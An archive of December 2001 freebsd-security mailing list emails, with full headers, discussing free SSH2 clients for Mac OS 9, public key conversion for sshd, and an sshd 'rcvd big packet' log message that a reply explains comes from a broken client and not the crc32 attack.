Received: from savvyd (c3-1a119.neo.rr.com [24.93.230.119])
	by lily.ezo.net (8.11.3/8.11.3) with SMTP id fB8EWCN00527;
	Sat, 8 Dec 2001 09:32:13 -0500 (EST)
Message-ID: <001f01c17ff3$ed1cc270$22b197ce@ezo.net>
From: "Jim Flowers" <jflowers@ezo.net>
To: <xphilius@yahoo.com>, "micheas" <micheas@micheas.dyns.net>
Cc: <security@FreeBSD.ORG>
References: <20011208071154.72128.qmail@web11801.mail.yahoo.com>
Subject: Re: Anyone know Free Mac OS 9.xx SSH2 client??
Date: Sat, 8 Dec 2001 09:23:33 -0500
Organization: EZNets, Inc.
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

You don't say what the ssh server is but I assume it is stock fbsd.  Can you
generate DSA key pair on Mac and then convert the public key with
`ssh-keygen -X -f ~/.ssh/whateverkey.pub >> authorized_keys2`.  This is
explained well in SecureCRT help doumentation.  Just figured it out for the
ssh.com client.

----- Original Message -----
From: "X Philius" <xphilius@yahoo.com>
To: "micheas" <micheas@micheas.dyns.net>
Cc: <security@FreeBSD.ORG>
Sent: Saturday, December 08, 2001 2:11 AM
Subject: Re: Anyone know Free Mac OS 9.xx SSH2 client??


> Micheas,
> But have you managed to use it with public key authentication, SSH2 DSA
> type? I have used MacSSH, and it works fine for SSH2 with password
> auth, but I get the error described below when I try to use public key
> auth.
>
> Jason
>
> --- micheas <micheas@micheas.dyns.net> wrote:
> > macssh is a gpl product that I find usefull
> >
> > http://macssh.com
> >
> --- xphilius
> I have tried MacSSH (based on the classic Better
> > > Telnet) and it works for regular password logins, but not with a
> > public key.  It always fails with this error (from the server log):
> > > Dec  5 22:07:06 myserver sshd[44444]: bad pkalg spki-sign-dss
> > > Dec  5 22:07:06 myserver sshd[44444]: Failed publickey for me from
> > > xxx.xxx.xxx.xxx port 49157 ssh2
>
>
>
> __________________________________________________
> Do You Yahoo!?
> Send your FREE holiday greetings online!
> http://greetings.yahoo.com
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
>


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Sat Dec  8  7:49:19 2001
Delivered-To: freebsd-security@freebsd.org
Received: from hotmail.com (law2-oe51.hotmail.com [216.32.180.49])
	by hub.freebsd.org (Postfix) with ESMTP id 19C0837B41D
	for <security@FreeBSD.ORG>; Sat,  8 Dec 2001 07:49:18 -0800 (PST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Sat, 8 Dec 2001 07:49:17 -0800
X-Originating-IP: [150.209.129.118]
From: "David Kutcher" <david_kutcher@hotmail.com>
To: "Jim Flowers" <jflowers@ezo.net>, <xphilius@yahoo.com>,
	"micheas" <micheas@micheas.dyns.net>
Cc: <security@FreeBSD.ORG>
References: <20011208071154.72128.qmail@web11801.mail.yahoo.com> <001f01c17ff3$ed1cc270$22b197ce@ezo.net>
Subject: Re: Anyone know Free Mac OS 9.xx SSH2 client??
Date: Sat, 8 Dec 2001 10:46:06 -0500
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Message-ID: <LAW2-OE519SChJmoXRx0000673b@hotmail.com>
X-OriginalArrivalTime: 08 Dec 2001 15:49:17.0948 (UTC) FILETIME=[E50FA3C0:01C17FFF]
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

http://w3.arizona.edu/~consult/mac-mindt.html

MindTerm.  MindTerm and Fetch were the only method so far that I've been
able to use to connect a non-OSX mac to an SSH server (terminal and ftp)

David

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Sat Dec  8  9:39: 2 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mx04.nexgo.de (mx04.nexgo.de [151.189.8.80])
	by hub.freebsd.org (Postfix) with ESMTP id 29EB437B405
	for <freebsd-security@freebsd.org>; Sat,  8 Dec 2001 09:39:01 -0800 (PST)
Received: from localhost (dsl-213-023-062-252.arcor-ip.net [213.23.62.252])
	by mx04.nexgo.de (Postfix) with ESMTP
	id C398C37BA7; Sat,  8 Dec 2001 18:38:55 +0100 (CET)
Received: by localhost (Postfix, from userid 31451)
	id 4D09743CF; Sat,  8 Dec 2001 18:38:45 +0100 (CET)
Date: Sat, 8 Dec 2001 18:38:44 +0100
From: Markus Friedl <markus@openbsd.org>
To: Emre Bastuz <info@emre.de>
Cc: freebsd-security@freebsd.org
Subject: Re: sshd: rcvd big packet ?
Message-ID: <20011208183844.A4218@folly>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

> I just noticed a lot of messages in /var/log/messages
> that look like this:
> Nov 26 15:28:17 myhost sshd[19978]: channel 1: rcvd big packet 31535, maxpack 16384
> 
> After doing some research on google, I found out that this is some kind
> of indicator for the sshd crc32 attack.

no. not at all. it's an indicator for a broken ssh client.

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Sat Dec  8 18:24: 2 2001
Delivered-To: freebsd-security@freebsd.org
Received: from stipho.dyndns.org (AVelizy-106-1-2-71.abo.wanadoo.fr [80.11.242.71])
	by hub.freebsd.org (Postfix) with SMTP id 8C13437B41F
	for <freebsd-security@freebsd.org>; Sat,  8 Dec 2001 18:23:56 -0800 (PST)
Received: from dolphene by stipho.dyndns.org for <freebsd-security@freebsd.org>; Sun, 9 Dec 2001 03:26:26 +1GMT
Message-ID: <01ba01c18057$4e21c2b0$0600a8c0@dolphene>
From: "Benjamin APPERT" <mlsecu@stipho.dyndns.org>
To: <freebsd-security@freebsd.org>
Subject: suscribe
Date: Sun, 9 Dec 2001 03:15:00 +0100
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2919.6700
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message